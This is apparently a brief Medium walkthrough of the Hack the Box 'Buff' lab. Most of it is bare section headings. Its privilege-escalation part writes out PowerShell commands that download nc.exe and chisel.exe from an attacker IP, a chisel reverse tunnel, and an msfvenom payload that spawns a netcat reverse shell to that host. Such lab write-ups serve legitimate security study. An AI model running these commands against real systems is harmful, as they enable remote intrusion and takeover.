Hack the Box: Buff

Buff

Recon

Nmap scan
Main page
Contact,php

User

Getting a webshell
User flag

Privlege escalation

Open port 8888 on localhost
# tasklist

Image Name PID Session Name Session# Mem Usage
========================= ======== ================ =========== ============
System Idle Process 0 0 8 K
System 4 0 140 K
-- snip --
CloudMe.exe 6640 0 37,704 K
-- snip --
CloudMe 1.11.2
# powershell -nop -c “Invoke-WebRequest -Uri http://10.10.14.20/nc.exe -OutFile C:\xampp\htdocs\gym\upload\nc.exe -Verbose”# powershell -nop -command “iwr “http://10.10.14.20/chisel.exe" -Outfile “C:\xampp\htdocs\gym\upload\chisel.exe””
./chisel_1.6.0_linux_386 server -p 4445 -reverse
chisel.exe client 10.10.14.20:4445 R:8888:127.0.0.1:8888
msfvenom -a x86 -p windows/exec CMD=’C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.20 443 -e cmd.exe’ -b ‘\x00\x0a\x0d’ -f python
Root flag

--

--

--

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

{UPDATE} DOOM Hack Free Resources Generator

Earning Bounties: An Introduction to OpenSea’s Affiliate Program

Algorithmic Detection of Malware Domains — Proof of Concept

Catching Phishing/Spam Emails without Having Access to their Content

Episode 2: The Age of Internet Shutdowns with Berhan Taye

Dear “Password Salts”, save us from “Brute Force Attack”!

Here Comes the California Consumer Privacy Act

What lies beneath Public-Key-Cryptography?

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tellico Lungrevink

Tellico Lungrevink

More from Medium

Hack the Box: ScriptKiddie

HTB Starting Point-Redeemer

Honey Pot in Tokyo

Dig Dug(EASY) — Try hack Me